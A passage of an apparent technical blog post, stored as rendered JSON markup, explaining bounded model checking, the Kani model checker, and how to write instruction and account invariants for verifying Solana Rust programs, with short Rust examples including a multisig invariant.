,{"type":33,"value":2830},{"type":28,"tag":116,"props":19472,"children":19473},{"class":245,"line":1047},[19474,19478,19482,19486,19490,19494],{"type":28,"tag":116,"props":19475,"children":19476},{"style":266},[19477],{"type":33,"value":19320},{"type":28,"tag":116,"props":19479,"children":19480},{"style":370},[19481],{"type":33,"value":2340},{"type":28,"tag":116,"props":19483,"children":19484},{"style":266},[19485],{"type":33,"value":4183},{"type":28,"tag":116,"props":19487,"children":19488},{"style":370},[19489],{"type":33,"value":2268},{"type":28,"tag":116,"props":19491,"children":19492},{"style":350},[19493],{"type":33,"value":4192},{"type":28,"tag":116,"props":19495,"children":19496},{"style":266},[19497],{"type":33,"value":2830},{"type":28,"tag":116,"props":19499,"children":19500},{"class":245,"line":1071},[19501],{"type":28,"tag":116,"props":19502,"children":19503},{"emptyLinePlaceholder":19},[19504],{"type":33,"value":1044},{"type":28,"tag":116,"props":19506,"children":19507},{"class":245,"line":1137},[19508],{"type":28,"tag":116,"props":19509,"children":19510},{"style":250},[19511],{"type":33,"value":19355},{"type":28,"tag":116,"props":19513,"children":19514},{"class":245,"line":1181},[19515,19519,19523,19527],{"type":28,"tag":116,"props":19516,"children":19517},{"style":266},[19518],{"type":33,"value":19363},{"type":28,"tag":116,"props":19520,"children":19521},{"style":370},[19522],{"type":33,"value":15350},{"type":28,"tag":116,"props":19524,"children":19525},{"style":350},[19526],{"type":33,"value":18917},{"type":28,"tag":116,"props":19528,"children":19529},{"style":266},[19530],{"type":33,"value":19376},{"type":28,"tag":116,"props":19532,"children":19533},{"class":245,"line":1212},[19534,19538,19542],{"type":28,"tag":116,"props":19535,"children":19536},{"style":282},[19537],{"type":33,"value":19384},{"type":28,"tag":116,"props":19539,"children":19540},{"style":266},[19541],{"type":33,"value":19389},{"type":28,"tag":116,"props":19543,"children":19544},{"style":250},[19545],{"type":33,"value":19394},{"type":28,"tag":29,"props":19547,"children":19548},{},[19549,19551,19557,19559,19564],{"type":33,"value":19550},"Both of these cases return ",{"type":28,"tag":98,"props":19552,"children":19554},{"className":19553},[],[19555],{"type":33,"value":19556},"unsat",{"type":33,"value":19558}," meaning z3 could not find a way to violate the correctness property, hence our program is ",{"type":28,"tag":2583,"props":19560,"children":19561},{},[19562],{"type":33,"value":19563},"correct",{"type":33,"value":19565}," according to this property.",{"type":28,"tag":75,"props":19567,"children":19569},{"id":19568},"loop-bounds-path-explosion",[19570],{"type":33,"value":19571},"Loop bounds & path explosion",{"type":28,"tag":29,"props":19573,"children":19574},{},[19575,19577,19582,19584,19589],{"type":33,"value":19576},"As you may have noticed, BMC requires us to take ",{"type":28,"tag":2583,"props":19578,"children":19579},{},[19580],{"type":33,"value":19581},"every",{"type":33,"value":19583}," branch in the program. To be sure that our property holds, we need to check every possible route through the program. If we have 10 branches in a row we might need to test 2^10 paths! And if our program has loops, we may need to check an ",{"type":28,"tag":2583,"props":19585,"children":19586},{},[19587],{"type":33,"value":19588},"infinite",{"type":33,"value":19590}," number of paths because the loop branches backward. This might take a while...",{"type":28,"tag":29,"props":19592,"children":19593},{},[19594],{"type":33,"value":19595},"This is where the \"bounded\" part of \"bounded model checking\" applies. Rather than unroll an infinite number of loops, we can set a loop bound and also verify that it is not possible to loop more than the loop bound.",{"type":28,"tag":29,"props":19597,"children":19598},{},[19599],{"type":33,"value":19600},"While this technique of bounding loops makes the problem tractable. It is still expensive to run BMC on very large programs due to the problem of path explosion. As our program gets larger, the number of possible paths scales potentially exponentially.",{"type":28,"tag":29,"props":19602,"children":19603},{},[19604],{"type":33,"value":19605},"One of the main challenges we will discuss later is how to address this problem of path explosion in the context of Solana Rust programs.",{"type":28,"tag":75,"props":19607,"children":19609},{"id":19608},"kani-model-checker",[19610],{"type":33,"value":19611},"Kani Model Checker",{"type":28,"tag":29,"props":19613,"children":19614},{},[19615,19617,19622],{"type":33,"value":19616},"For our research with formally verifying Solana programs, we are using the ",{"type":28,"tag":87,"props":19618,"children":19620},{"href":18511,"rel":19619},[91],[19621],{"type":33,"value":18515},{"type":33,"value":19623},": an open-source, bit-precise model checker for Rust created at AWS. Under the hood, Kani uses the C Bounded Model Checker (CBMC) to do the heavy lifting.",{"type":28,"tag":29,"props":19625,"children":19626},{},[19627,19629,19634,19636,19642,19643,19649,19651,19657],{"type":33,"value":19628},"Kani allows you to write ",{"type":28,"tag":2583,"props":19630,"children":19631},{},[19632],{"type":33,"value":19633},"proof harnesses",{"type":33,"value":19635}," which can invoke Rust functions with symbolic values. These harnesses can ",{"type":28,"tag":98,"props":19637,"children":19639},{"className":19638},[],[19640],{"type":33,"value":19641},"assume",{"type":33,"value":10659},{"type":28,"tag":98,"props":19644,"children":19646},{"className":19645},[],[19647],{"type":33,"value":19648},"assert",{"type":33,"value":19650}," certain conditions about these symbolic values and then you can verify that a proof harness holds via the ",{"type":28,"tag":98,"props":19652,"children":19654},{"className":19653},[],[19655],{"type":33,"value":19656},"cargo kani",{"type":33,"value":19658}," tool (which compiles your proof harness and runs BMC).",{"type":28,"tag":63,"props":19660,"children":19662},{"id":19661},"specification-how-can-we-describe-what-we-want-our-program-to-do",[19663,19665,19669],{"type":33,"value":19664},"Specification: How can we describe what we ",{"type":28,"tag":2583,"props":19666,"children":19667},{},[19668],{"type":33,"value":18584},{"type":33,"value":18586},{"type":28,"tag":29,"props":19671,"children":19672},{},[19673],{"type":28,"tag":2583,"props":19674,"children":19675},{},[19676],{"type":28,"tag":4995,"props":19677,"children":19678},{},[19679],{"type":33,"value":19680},"And what even do we want it to do?",{"type":28,"tag":29,"props":19682,"children":19683},{},[19684,19686,19691],{"type":33,"value":19685},"A fundamental challenge with any formal verification framework is ",{"type":28,"tag":2583,"props":19687,"children":19688},{},[19689],{"type":33,"value":19690},"specifying",{"type":33,"value":19692}," what the \"correct\" behavior should be.",{"type":28,"tag":29,"props":19694,"children":19695},{},[19696],{"type":33,"value":19697},"In natural language, we can describe a few good properties for example Solana programs:",{"type":28,"tag":2108,"props":19699,"children":19700},{},[19701,19713,19724],{"type":28,"tag":459,"props":19702,"children":19703},{},[19704,19706,19711],{"type":33,"value":19705},"\"It should not be possible to ",{"type":28,"tag":4995,"props":19707,"children":19708},{},[19709],{"type":33,"value":19710},"steal money",{"type":33,"value":19712}," via a swap program\"",{"type":28,"tag":459,"props":19714,"children":19715},{},[19716,19718,19723],{"type":33,"value":19717},"\"A multisig should never get into a state where you ",{"type":28,"tag":4995,"props":19719,"children":19720},{},[19721],{"type":33,"value":19722},"can't sign anything",{"type":33,"value":2240},{"type":28,"tag":459,"props":19725,"children":19726},{},[19727],{"type":33,"value":19728},"\"User funds in a staking protocol \"",{"type":28,"tag":29,"props":19730,"children":19731},{},[19732,19734,19744,19746,19751],{"type":33,"value":19733},"These are types of properties you can tell your ",{"type":28,"tag":87,"props":19735,"children":19738},{"href":19736,"rel":19737},"https://osec.io/",[91],[19739],{"type":28,"tag":2583,"props":19740,"children":19741},{},[19742],{"type":33,"value":19743},"human auditors",{"type":33,"value":19745}," but these English phrases are not particularly useful for ",{"type":28,"tag":2583,"props":19747,"children":19748},{},[19749],{"type":33,"value":19750},"automated verification techniques",{"type":33,"value":19752}," (at least until our AI overlords surpass human intelligence).",{"type":28,"tag":29,"props":19754,"children":19755},{},[19756,19758,19763,19765,19770],{"type":33,"value":19757},"Instead, we need to be able to specify ",{"type":28,"tag":2583,"props":19759,"children":19760},{},[19761],{"type":33,"value":19762},"in code",{"type":33,"value":19764}," what properties we want to check. Ideally, we could define invariants that fit nicely into something like an ",{"type":28,"tag":98,"props":19766,"children":19768},{"className":19767},[],[19769],{"type":33,"value":19648},{"type":33,"value":19771}," statement.",{"type":28,"tag":75,"props":19773,"children":19775},{"id":19774},"solana-invariants",[19776],{"type":33,"value":19777},"Solana Invariants",{"type":28,"tag":29,"props":19779,"children":19780},{},[19781,19783,19788,19789,19794],{"type":33,"value":19782},"In the context of Solana programs we define two different types of properties that we would like to verify: ",{"type":28,"tag":4995,"props":19784,"children":19785},{},[19786],{"type":33,"value":19787},"instruction invariants",{"type":33,"value":10659},{"type":28,"tag":4995,"props":19790,"children":19791},{},[19792],{"type":33,"value":19793},"account invariants",{"type":33,"value":141},{"type":28,"tag":443,"props":19796,"children":19798},{"id":19797},"instruction-invariant",[19799],{"type":33,"value":19800},"Instruction Invariant",{"type":28,"tag":29,"props":19802,"children":19803},{},[19804,19806,19811,19813,19819,19820,19826],{"type":33,"value":19805},"An ",{"type":28,"tag":4995,"props":19807,"children":19808},{},[19809],{"type":33,"value":19810},"instruction invariant",{"type":33,"value":19812}," specifies sufficient conditions for an instruction to succeed (or fail). These are specified as ",{"type":28,"tag":98,"props":19814,"children":19816},{"className":19815},[],[19817],{"type":33,"value":19818},"succeeds_if",{"type":33,"value":12800},{"type":28,"tag":98,"props":19821,"children":19823},{"className":19822},[],[19824],{"type":33,"value":19825},"errors_if",{"type":33,"value":19827}," macro annotations on the instruction handler.",{"type":28,"tag":29,"props":19829,"children":19830},{},[19831],{"type":33,"value":19832},"In Solana, when an instruction fails, the entire transaction is reverted. Failing an instruction on purpose is commonly used as a form of access control; invalid accounts, bad state, etc... will cause an instruction to fail and get reverted.",{"type":28,"tag":29,"props":19834,"children":19835},{},[19836,19838,19844,19846,19851],{"type":33,"value":19837},"For example, say we have a ",{"type":28,"tag":98,"props":19839,"children":19841},{"className":19840},[],[19842],{"type":33,"value":19843},"Withdraw",{"type":33,"value":19845}," instruction that lets a user withdraw some tokens. A security critical property we may want to verify is that the user cannot withdraw ",{"type":28,"tag":2583,"props":19847,"children":19848},{},[19849],{"type":33,"value":19850},"more",{"type":33,"value":19852}," tokens than their current balance.",{"type":28,"tag":29,"props":19854,"children":19855},{},[19856,19858,19863],{"type":33,"value":19857},"Using our tool, you could specify the following ",{"type":28,"tag":98,"props":19859,"children":19861},{"className":19860},[],[19862],{"type":33,"value":19825},{"type":33,"value":19864}," property on your instruction handler:",{"type":28,"tag":234,"props":19866,"children":19868},{"code":19867,"language":2651,"meta":7,"className":2652,"style":7},"#[errors_if(\n    ctx.user.balance \u003C amount\n)]\nfn withdraw(ctx: Context\u003CWithdraw>, amount: u64) -> Result\u003C()> {\n    ...\n}\n",[19869],{"type":28,"tag":98,"props":19870,"children":19871},{"__ignoreMap":7},[19872,19880,19915,19923,19996,20004],{"type":28,"tag":116,"props":19873,"children":19874},{"class":245,"line":246},[19875],{"type":28,"tag":116,"props":19876,"children":19877},{"style":266},[19878],{"type":33,"value":19879},"#[errors_if(\n",{"type":28,"tag":116,"props":19881,"children":19882},{"class":245,"line":256},[19883,19888,19892,19897,19901,19906,19910],{"type":28,"tag":116,"props":19884,"children":19885},{"style":266},[19886],{"type":33,"value":19887},"    ctx",{"type":28,"tag":116,"props":19889,"children":19890},{"style":370},[19891],{"type":33,"value":141},{"type":28,"tag":116,"props":19893,"children":19894},{"style":266},[19895],{"type":33,"value":19896},"user",{"type":28,"tag":116,"props":19898,"children":19899},{"style":370},[19900],{"type":33,"value":141},{"type":28,"tag":116,"props":19902,"children":19903},{"style":266},[19904],{"type":33,"value":19905},"balance ",{"type":28,"tag":116,"props":19907,"children":19908},{"style":370},[19909],{"type":33,"value":514},{"type":28,"tag":116,"props":19911,"children":19912},{"style":266},[19913],{"type":33,"value":19914}," amount\n",{"type":28,"tag":116,"props":19916,"children":19917},{"class":245,"line":293},[19918],{"type":28,"tag":116,"props":19919,"children":19920},{"style":266},[19921],{"type":33,"value":19922},")]\n",{"type":28,"tag":116,"props":19924,"children":19925},{"class":245,"line":361},[19926,19931,19936,19940,19945,19949,19954,19958,19962,19966,19971,19975,19979,19983,19987,19991],{"type":28,"tag":116,"props":19927,"children":19928},{"style":376},[19929],{"type":33,"value":19930},"fn",{"type":28,"tag":116,"props":19932,"children":19933},{"style":282},[19934],{"type":33,"value":19935}," withdraw",{"type":28,"tag":116,"props":19937,"children":19938},{"style":266},[19939],{"type":33,"value":313},{"type":28,"tag":116,"props":19941,"children":19942},{"style":272},[19943],{"type":33,"value":19944},"ctx",{"type":28,"tag":116,"props":19946,"children":19947},{"style":370},[19948],{"type":33,"value":4160},{"type":28,"tag":116,"props":19950,"children":19951},{"style":339},[19952],{"type":33,"value":19953}," Context",{"type":28,"tag":116,"props":19955,"children":19956},{"style":266},[19957],{"type":33,"value":514},{"type":28,"tag":116,"props":19959,"children":19960},{"style":339},[19961],{"type":33,"value":19843},{"type":28,"tag":116,"props":19963,"children":19964},{"style":266},[19965],{"type":33,"value":6302},{"type":28,"tag":116,"props":19967,"children":19968},{"style":272},[19969],{"type":33,"value":19970},"amount",{"type":28,"tag":116,"props":19972,"children":19973},{"style":370},[19974],{"type":33,"value":4160},{"type":28,"tag":116,"props":19976,"children":19977},{"style":339},[19978],{"type":33,"value":5531},{"type":28,"tag":116,"props":19980,"children":19981},{"style":266},[19982],{"type":33,"value":1609},{"type":28,"tag":116,"props":19984,"children":19985},{"style":370},[19986],{"type":33,"value":13423},{"type":28,"tag":116,"props":19988,"children":19989},{"style":339},[19990],{"type":33,"value":13428},{"type":28,"tag":116,"props":19992,"children":19993},{"style":266},[19994],{"type":33,"value":19995},"\u003C()> {\n",{"type":28,"tag":116,"props":19997,"children":19998},{"class":245,"line":387},[19999],{"type":28,"tag":116,"props":20000,"children":20001},{"style":370},[20002],{"type":33,"value":20003},"    ...\n",{"type":28,"tag":116,"props":20005,"children":20006},{"class":245,"line":400},[20007],{"type":28,"tag":116,"props":20008,"children":20009},{"style":266},[20010],{"type":33,"value":406},{"type":28,"tag":107,"props":20012,"children":20013},{},[20014],{"type":28,"tag":29,"props":20015,"children":20016},{},[20017,20018,20023,20025,20030,20032,20037],{"type":33,"value":16275},{"type":28,"tag":98,"props":20019,"children":20021},{"className":20020},[],[20022],{"type":33,"value":19825},{"type":33,"value":20024}," expression specifies ",{"type":28,"tag":2583,"props":20026,"children":20027},{},[20028],{"type":33,"value":20029},"succifient",{"type":33,"value":20031}," but not ",{"type":28,"tag":2583,"props":20033,"children":20034},{},[20035],{"type":33,"value":20036},"necessary",{"type":33,"value":20038}," conditions for an instruction to fail. I.e. it imposes a strong lower bound on what the requirements are for an instruction to fail.",{"type":28,"tag":18457,"props":20040,"children":20041},{},[],{"type":28,"tag":29,"props":20043,"children":20044},{},[20045,20047,20052],{"type":33,"value":20046},"Another example is that for ",{"type":28,"tag":2583,"props":20048,"children":20049},{},[20050],{"type":33,"value":20051},"crank",{"type":33,"value":20053}," functions — run by unauthenticated users to advance the state of the system, you may want to prove that they never fail. In that case, you could specify an invariant like the following:",{"type":28,"tag":234,"props":20055,"children":20057},{"code":20056,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if(true)]\nfn my_crank(ctx: Context\u003CCrank>) -> Result\u003C()> {\n    ...\n}\n",[20058],{"type":28,"tag":98,"props":20059,"children":20060},{"__ignoreMap":7},[20061,20069,20123,20130],{"type":28,"tag":116,"props":20062,"children":20063},{"class":245,"line":246},[20064],{"type":28,"tag":116,"props":20065,"children":20066},{"style":266},[20067],{"type":33,"value":20068},"#[succeeds_if(true)]\n",{"type":28,"tag":116,"props":20070,"children":20071},{"class":245,"line":256},[20072,20076,20081,20085,20089,20093,20097,20101,20106,20111,20115,20119],{"type":28,"tag":116,"props":20073,"children":20074},{"style":376},[20075],{"type":33,"value":19930},{"type":28,"tag":116,"props":20077,"children":20078},{"style":282},[20079],{"type":33,"value":20080}," my_crank",{"type":28,"tag":116,"props":20082,"children":20083},{"style":266},[20084],{"type":33,"value":313},{"type":28,"tag":116,"props":20086,"children":20087},{"style":272},[20088],{"type":33,"value":19944},{"type":28,"tag":116,"props":20090,"children":20091},{"style":370},[20092],{"type":33,"value":4160},{"type":28,"tag":116,"props":20094,"children":20095},{"style":339},[20096],{"type":33,"value":19953},{"type":28,"tag":116,"props":20098,"children":20099},{"style":266},[20100],{"type":33,"value":514},{"type":28,"tag":116,"props":20102,"children":20103},{"style":339},[20104],{"type":33,"value":20105},"Crank",{"type":28,"tag":116,"props":20107,"children":20108},{"style":266},[20109],{"type":33,"value":20110},">) ",{"type":28,"tag":116,"props":20112,"children":20113},{"style":370},[20114],{"type":33,"value":13423},{"type":28,"tag":116,"props":20116,"children":20117},{"style":339},[20118],{"type":33,"value":13428},{"type":28,"tag":116,"props":20120,"children":20121},{"style":266},[20122],{"type":33,"value":19995},{"type":28,"tag":116,"props":20124,"children":20125},{"class":245,"line":293},[20126],{"type":28,"tag":116,"props":20127,"children":20128},{"style":370},[20129],{"type":33,"value":20003},{"type":28,"tag":116,"props":20131,"children":20132},{"class":245,"line":361},[20133],{"type":28,"tag":116,"props":20134,"children":20135},{"style":266},[20136],{"type":33,"value":406},{"type":28,"tag":29,"props":20138,"children":20139},{},[20140,20142,20146,20148,20154],{"type":33,"value":20141},"With this invariant, you could prove that the function ",{"type":28,"tag":2583,"props":20143,"children":20144},{},[20145],{"type":33,"value":12760},{"type":33,"value":20147}," returns ",{"type":28,"tag":98,"props":20149,"children":20151},{"className":20150},[],[20152],{"type":33,"value":20153},"Ok",{"type":33,"value":20155},". This type of construction could help avoid possible denial of service attacks if a crank could get \"stuck.\"",{"type":28,"tag":18457,"props":20157,"children":20158},{},[],{"type":28,"tag":29,"props":20160,"children":20161},{},[20162,20164,20169,20170,20175,20177,20182,20184,20189,20191,20196],{"type":33,"value":20163},"Note that ",{"type":28,"tag":98,"props":20165,"children":20167},{"className":20166},[],[20168],{"type":33,"value":19818},{"type":33,"value":10659},{"type":28,"tag":98,"props":20171,"children":20173},{"className":20172},[],[20174],{"type":33,"value":19825},{"type":33,"value":20176}," are both implications and not biconditionals. That is, a function may succeed even if ",{"type":28,"tag":98,"props":20178,"children":20180},{"className":20179},[],[20181],{"type":33,"value":19818},{"type":33,"value":20183}," is not satisfied and a function may fail even if ",{"type":28,"tag":98,"props":20185,"children":20187},{"className":20186},[],[20188],{"type":33,"value":19825},{"type":33,"value":20190}," is not satisfied. If you want to prove the ",{"type":28,"tag":2583,"props":20192,"children":20193},{},[20194],{"type":33,"value":20195},"exact condition",{"type":33,"value":20197}," required for an instruction to succeed, you could use a form like the following:",{"type":28,"tag":234,"props":20199,"children":20201},{"code":20200,"language":2651,"meta":7,"className":2652,"style":7},"fn my_invariant(...) -> bool { ... }\n\n#[succeeds_if(my_invariant(...))]\n#[errors_if(!my_invariant(...))]\nfn my_instruction(ctx: Context\u003C...>) -> Result\u003C()> {\n    ...\n}\n",[20202],{"type":28,"tag":98,"props":20203,"children":20204},{"__ignoreMap":7},[20205,20249,20256,20273,20299,20351,20358],{"type":28,"tag":116,"props":20206,"children":20207},{"class":245,"line":246},[20208,20212,20217,20221,20225,20229,20233,20237,20241,20245],{"type":28,"tag":116,"props":20209,"children":20210},{"style":376},[20211],{"type":33,"value":19930},{"type":28,"tag":116,"props":20213,"children":20214},{"style":282},[20215],{"type":33,"value":20216}," my_invariant",{"type":28,"tag":116,"props":20218,"children":20219},{"style":266},[20220],{"type":33,"value":313},{"type":28,"tag":116,"props":20222,"children":20223},{"style":370},[20224],{"type":33,"value":9259},{"type":28,"tag":116,"props":20226,"children":20227},{"style":266},[20228],{"type":33,"value":1609},{"type":28,"tag":116,"props":20230,"children":20231},{"style":370},[20232],{"type":33,"value":13423},{"type":28,"tag":116,"props":20234,"children":20235},{"style":339},[20236],{"type":33,"value":11718},{"type":28,"tag":116,"props":20238,"children":20239},{"style":266},[20240],{"type":33,"value":9254},{"type":28,"tag":116,"props":20242,"children":20243},{"style":370},[20244],{"type":33,"value":9259},{"type":28,"tag":116,"props":20246,"children":20247},{"style":266},[20248],{"type":33,"value":9264},{"type":28,"tag":116,"props":20250,"children":20251},{"class":245,"line":256},[20252],{"type":28,"tag":116,"props":20253,"children":20254},{"emptyLinePlaceholder":19},[20255],{"type":33,"value":1044},{"type":28,"tag":116,"props":20257,"children":20258},{"class":245,"line":293},[20259,20264,20268],{"type":28,"tag":116,"props":20260,"children":20261},{"style":266},[20262],{"type":33,"value":20263},"#[succeeds_if(my_invariant(",{"type":28,"tag":116,"props":20265,"children":20266},{"style":370},[20267],{"type":33,"value":9259},{"type":28,"tag":116,"props":20269,"children":20270},{"style":266},[20271],{"type":33,"value":20272},"))]\n",{"type":28,"tag":116,"props":20274,"children":20275},{"class":245,"line":361},[20276,20281,20286,20291,20295],{"type":28,"tag":116,"props":20277,"children":20278},{"style":266},[20279],{"type":33,"value":20280},"#[errors_if(",{"type":28,"tag":116,"props":20282,"children":20283},{"style":370},[20284],{"type":33,"value":20285},"!",{"type":28,"tag":116,"props":20287,"children":20288},{"style":266},[20289],{"type":33,"value":20290},"my_invariant(",{"type":28,"tag":116,"props":20292,"children":20293},{"style":370},[20294],{"type":33,"value":9259},{"type":28,"tag":116,"props":20296,"children":20297},{"style":266},[20298],{"type":33,"value":20272},{"type":28,"tag":116,"props":20300,"children":20301},{"class":245,"line":387},[20302,20306,20311,20315,20319,20323,20327,20331,20335,20339,20343,20347],{"type":28,"tag":116,"props":20303,"children":20304},{"style":376},[20305],{"type":33,"value":19930},{"type":28,"tag":116,"props":20307,"children":20308},{"style":282},[20309],{"type":33,"value":20310}," my_instruction",{"type":28,"tag":116,"props":20312,"children":20313},{"style":266},[20314],{"type":33,"value":313},{"type":28,"tag":116,"props":20316,"children":20317},{"style":272},[20318],{"type":33,"value":19944},{"type":28,"tag":116,"props":20320,"children":20321},{"style":370},[20322],{"type":33,"value":4160},{"type":28,"tag":116,"props":20324,"children":20325},{"style":339},[20326],{"type":33,"value":19953},{"type":28,"tag":116,"props":20328,"children":20329},{"style":266},[20330],{"type":33,"value":514},{"type":28,"tag":116,"props":20332,"children":20333},{"style":370},[20334],{"type":33,"value":9259},{"type":28,"tag":116,"props":20336,"children":20337},{"style":266},[20338],{"type":33,"value":20110},{"type":28,"tag":116,"props":20340,"children":20341},{"style":370},[20342],{"type":33,"value":13423},{"type":28,"tag":116,"props":20344,"children":20345},{"style":339},[20346],{"type":33,"value":13428},{"type":28,"tag":116,"props":20348,"children":20349},{"style":266},[20350],{"type":33,"value":19995},{"type":28,"tag":116,"props":20352,"children":20353},{"class":245,"line":400},[20354],{"type":28,"tag":116,"props":20355,"children":20356},{"style":370},[20357],{"type":33,"value":20003},{"type":28,"tag":116,"props":20359,"children":20360},{"class":245,"line":614},[20361],{"type":28,"tag":116,"props":20362,"children":20363},{"style":266},[20364],{"type":33,"value":406},{"type":28,"tag":29,"props":20366,"children":20367},{},[20368],{"type":33,"value":20369},"Note that in practice, it is usually not necessary (or useful) to find the exact condition; rather we can achieve the security properties we want purely by proving upper and lower bounds on instruction success.",{"type":28,"tag":443,"props":20371,"children":20373},{"id":20372},"account-invariants",[20374],{"type":33,"value":20375},"Account Invariants",{"type":28,"tag":29,"props":20377,"children":20378},{},[20379,20381,20386],{"type":33,"value":20380},"The other type of invariant is an ",{"type":28,"tag":4995,"props":20382,"children":20383},{},[20384],{"type":33,"value":20385},"Account Invariant",{"type":33,"value":20387},". This invariant describes some property of an account that should always hold.",{"type":28,"tag":29,"props":20389,"children":20390},{},[20391,20393,20398,20399,20405],{"type":33,"value":20392},"In our tool, we verify that the account invariant holds after every instruction that could modify the account data (i.e. if the account is ",{"type":28,"tag":98,"props":20394,"children":20396},{"className":20395},[],[20397],{"type":33,"value":3394},{"type":33,"value":12800},{"type":28,"tag":98,"props":20400,"children":20402},{"className":20401},[],[20403],{"type":33,"value":20404},"init",{"type":33,"value":1484},{"type":28,"tag":29,"props":20407,"children":20408},{},[20409,20411,20417],{"type":33,"value":20410},"For example, given a mock ",{"type":28,"tag":98,"props":20412,"children":20414},{"className":20413},[],[20415],{"type":33,"value":20416},"UserStatement",{"type":33,"value":20418}," account that represents how much a user owns and owes, we could write an invariant that asserts that the net balance is positive:",{"type":28,"tag":234,"props":20420,"children":20422},{"code":20421,"language":2651,"meta":7,"className":2652,"style":7},"#[account]\n#[invariant(\n    self.assets >= self.liabilities\n)]\nstruct UserStatement {\n    pub owner: Pubkey,\n    pub assets: u64,\n    pub liabilities: u64,\n}\n",[20423],{"type":28,"tag":98,"props":20424,"children":20425},{"__ignoreMap":7},[20426,20434,20442,20476,20483,20499,20525,20549,20573],{"type":28,"tag":116,"props":20427,"children":20428},{"class":245,"line":246},[20429],{"type":28,"tag":116,"props":20430,"children":20431},{"style":266},[20432],{"type":33,"value":20433},"#[account]\n",{"type":28,"tag":116,"props":20435,"children":20436},{"class":245,"line":256},[20437],{"type":28,"tag":116,"props":20438,"children":20439},{"style":266},[20440],{"type":33,"value":20441},"#[invariant(\n",{"type":28,"tag":116,"props":20443,"children":20444},{"class":245,"line":293},[20445,20450,20454,20459,20463,20467,20471],{"type":28,"tag":116,"props":20446,"children":20447},{"style":266},[20448],{"type":33,"value":20449},"    self",{"type":28,"tag":116,"props":20451,"children":20452},{"style":370},[20453],{"type":33,"value":141},{"type":28,"tag":116,"props":20455,"children":20456},{"style":266},[20457],{"type":33,"value":20458},"assets ",{"type":28,"tag":116,"props":20460,"children":20461},{"style":370},[20462],{"type":33,"value":9611},{"type":28,"tag":116,"props":20464,"children":20465},{"style":266},[20466],{"type":33,"value":13463},{"type":28,"tag":116,"props":20468,"children":20469},{"style":370},[20470],{"type":33,"value":141},{"type":28,"tag":116,"props":20472,"children":20473},{"style":266},[20474],{"type":33,"value":20475},"liabilities\n",{"type":28,"tag":116,"props":20477,"children":20478},{"class":245,"line":361},[20479],{"type":28,"tag":116,"props":20480,"children":20481},{"style":266},[20482],{"type":33,"value":19922},{"type":28,"tag":116,"props":20484,"children":20485},{"class":245,"line":387},[20486,20490,20495],{"type":28,"tag":116,"props":20487,"children":20488},{"style":376},[20489],{"type":33,"value":9069},{"type":28,"tag":116,"props":20491,"children":20492},{"style":339},[20493],{"type":33,"value":20494}," UserStatement",{"type":28,"tag":116,"props":20496,"children":20497},{"style":266},[20498],{"type":33,"value":1291},{"type":28,"tag":116,"props":20500,"children":20501},{"class":245,"line":400},[20502,20507,20512,20516,20521],{"type":28,"tag":116,"props":20503,"children":20504},{"style":376},[20505],{"type":33,"value":20506},"    pub",{"type":28,"tag":116,"props":20508,"children":20509},{"style":272},[20510],{"type":33,"value":20511}," owner",{"type":28,"tag":116,"props":20513,"children":20514},{"style":370},[20515],{"type":33,"value":4160},{"type":28,"tag":116,"props":20517,"children":20518},{"style":339},[20519],{"type":33,"value":20520}," Pubkey",{"type":28,"tag":116,"props":20522,"children":20523},{"style":266},[20524],{"type":33,"value":3178},{"type":28,"tag":116,"props":20526,"children":20527},{"class":245,"line":614},[20528,20532,20537,20541,20545],{"type":28,"tag":116,"props":20529,"children":20530},{"style":376},[20531],{"type":33,"value":20506},{"type":28,"tag":116,"props":20533,"children":20534},{"style":272},[20535],{"type":33,"value":20536}," assets",{"type":28,"tag":116,"props":20538,"children":20539},{"style":370},[20540],{"type":33,"value":4160},{"type":28,"tag":116,"props":20542,"children":20543},{"style":339},[20544],{"type":33,"value":5531},{"type":28,"tag":116,"props":20546,"children":20547},{"style":266},[20548],{"type":33,"value":3178},{"type":28,"tag":116,"props":20550,"children":20551},{"class":245,"line":631},[20552,20556,20561,20565,20569],{"type":28,"tag":116,"props":20553,"children":20554},{"style":376},[20555],{"type":33,"value":20506},{"type":28,"tag":116,"props":20557,"children":20558},{"style":272},[20559],{"type":33,"value":20560}," liabilities",{"type":28,"tag":116,"props":20562,"children":20563},{"style":370},[20564],{"type":33,"value":4160},{"type":28,"tag":116,"props":20566,"children":20567},{"style":339},[20568],{"type":33,"value":5531},{"type":28,"tag":116,"props":20570,"children":20571},{"style":266},[20572],{"type":33,"value":3178},{"type":28,"tag":116,"props":20574,"children":20575},{"class":245,"line":665},[20576],{"type":28,"tag":116,"props":20577,"children":20578},{"style":266},[20579],{"type":33,"value":406},{"type":28,"tag":29,"props":20581,"children":20582},{},[20583,20585,20590],{"type":33,"value":20584},"Our tool automatically generates the relevant harnesses to ensure that this property holds every time an account of type ",{"type":28,"tag":98,"props":20586,"children":20588},{"className":20587},[],[20589],{"type":33,"value":20416},{"type":33,"value":20591}," is created or modified.",{"type":28,"tag":29,"props":20593,"children":20594},{},[20595,20597,20603],{"type":33,"value":20596},"In another example, we developed the following invariant for the ",{"type":28,"tag":87,"props":20598,"children":20600},{"href":18488,"rel":20599},[91],[20601],{"type":33,"value":20602},"Squads Multisig",{"type":33,"value":20604}," wallet account:",{"type":28,"tag":234,"props":20606,"children":20608},{"code":20607,"language":2651,"meta":7,"className":2652,"style":7},"#[account]\n#[invariant(\n    !self.keys.is_empty()\n    && (self.keys.len() \u003C= u16::MAX as usize)\n    && (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n    pub threshold: u16,               // threshold for signatures\n    pub authority_index: u16,         // index to seed other authorities under this multisig\n    pub transaction_index: u32,       // look up and seed reference for transactions\n    pub ms_change_index: u32,         // the last executed/closed transaction\n    pub bump: u8,                     // bump for the multisig seed\n    pub create_key: Pubkey,           // random key(or not) used to seed the multisig pda\n    pub allow_external_execute: bool, // allow non-member keys to execute txs\n    pub keys: Vec\u003CPubkey>,            // keys of the 